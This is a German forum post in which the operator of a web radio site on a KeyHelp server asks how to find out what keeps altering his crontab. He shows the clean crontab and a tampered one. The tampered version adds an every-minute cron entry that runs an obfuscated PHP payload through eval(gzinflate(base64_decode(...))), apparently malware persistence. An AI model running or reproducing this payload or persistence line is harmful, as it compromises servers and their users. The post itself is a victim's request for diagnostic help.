Crontabs werden manipuliert
Posted: Mon 3. Mar 2025, 00:30
Hallo zusammen,
ich komme mit einer Sache nicht mehr klar. Ich habe zwei Cronjobs/Crontabs angelegt, diese arbeiten auch an sich tadelos.
Nur seit einigen Tagen, werden diese immer von irgendetwas manipuliert.
Ich habe sie jetzt schon zum 3. mal gelöscht und neu erstellt.
Normal sehen die so aus ( /var/spool/cron/crontabs/ ) :
Nach der Manipulation sieht die Datei aber wie folgt aus:
Im Ereignis-Protokolle wird nur angezeigt das ich drin war und etwas gemacht habe, folglich über KeyHelp wird schon mal nichts gemacht.
Wie bekomme ich raus, wer oder was da rumfummelt und die Cronjobs manipuliert?
In welchem Log könnte es stehen, wo ich nachschauen kann?
Danke schon mal
ich komme mit einer Sache nicht mehr klar. Ich habe zwei Cronjobs/Crontabs angelegt, diese arbeiten auch an sich tadelos.
Nur seit einigen Tagen, werden diese immer von irgendetwas manipuliert.
Ich habe sie jetzt schon zum 3. mal gelöscht und neu erstellt.
Normal sehen die so aus ( /var/spool/cron/crontabs/ ) :
Code: Select all
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/keyhelp/CronTab-67c4e729b71671.56693353 installed on Mon Mar 3 00:18:01 2025)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
#
# This config was generated by KeyHelp on 2025-03-03 00:18:01.
# System user: retterradio
#
SHELL=/bin/bash
TMPDIR=/home/users/retterradio/tmp/
# Playlist
MAILTO="sendeleitung@retter-radio.de"
*/5 * * * * /opt/keyhelp/php/8.4/bin/php /home/users/retterradio/www/webseiten/radioseite/stream_songhistorie.php > /dev/null
# Hörerstatistik
MAILTO="sendeleitung@retter-radio.de"
*/15 * * * * /opt/keyhelp/php/8.4/bin/php /home/users/retterradio/www/webseiten/radioseite/streamquery.php > /dev/null
Code: Select all
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Mon Mar 3 00:04:31 2025)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
#
# This config was generated by KeyHelp on 2025-03-02 22:05:01.
# System user: retterradio
#
SHELL=/bin/bash
TMPDIR=/home/users/retterradio/tmp/
# songhistorie
MAILTO="sendeleitung@retter-radio.de"
*/5 * * * * /opt/keyhelp/php/8.4/bin/php /home/users/retterradio/www/webseiten/radioseite/stream_songhistorie.php > /dev/null
# Hörerstatistik
MAILTO="sendeleitung@retter-radio.de"
*/15 * * * * /opt/keyhelp/php/8.4/bin/php /home/users/retterradio/www/webseiten/radioseite/streamquery.php > /dev/null
* * * * * /usr/bin/php -r 'eval(gzinflate(base64_decode("jVL7b9owEP6dvyKTkAJaNeVRoNVUbYzyHCEtlGCYJuQ4DjFxnDRxIDD1f5/Duw9ps+T4HN/33d13V4i8qBEy14KUOJDjkjx9ChWT8chc1mtoG+rGMiR9zVvZk/HKAQOKmLFCgaU4bWuDgpYPJzcrR3f0vu7QKRtQCIbUJre6rfd81OlRpBvivc7hpLK0O5Y/A+LetjhqZ57THqeo7a27yzxeM49XMe9D4gaWNp1kNqDrELQrCFHlGTS8/O6DUYR6rVv7caRCABLNtTgGLe78pJk9USuop66J8LFBw0Fdqnat1vARbBdr476pPT5Zx/+CK3NyLpDjG1Tg19FEva6BUVhzmUFMza8aS741l8bGJL36DMw8u7HwgTpojelM7ISNWsPxuHVzbdzXs4HfVHuqEpmbbg0+hVtTN6rGFlW7rIJBx3ieMSud6sPI1kQ9G85mYOgijaYzLaNAF5qBH8lUaOcGCjF15U4ufy24KUOchEx626ViguOy9KdQkMSiJOFSqeimlD5A7l1JxWSTcBw02UrYKHSwOCLIOY5ZWbqTUibQRFBtccmGCa5ezx2cu+1pRdyctZiEaYyw8HcJxfMF5nMUMo4ZT86xDr7ElUpRjBfzAHLklV7F39OU82ylw4oxT2O2h76cCD5dMhzSPeGFsXvByT+Y9rkThsI4xogP8QJnooaEx/MYRxQiMeJYlr5I8gruDipfSfL3bzCOd1e4kS8FPIrB8Hp01GOX55HsTSjBJZ+L/gB8mcixpF/K70OjRAYPnYd50+wL6/XzieTAev68E+9S/jPsf3TLWx1wEhzbvrMv2i19llRlD0sZJcx/Nwq7YYnSj4blgyJ4mOYJX3icogqPl8Jf")));'
Im Ereignis-Protokolle wird nur angezeigt das ich drin war und etwas gemacht habe, folglich über KeyHelp wird schon mal nichts gemacht.
Wie bekomme ich raus, wer oder was da rumfummelt und die Cronjobs manipuliert?
In welchem Log könnte es stehen, wo ich nachschauen kann?
Danke schon mal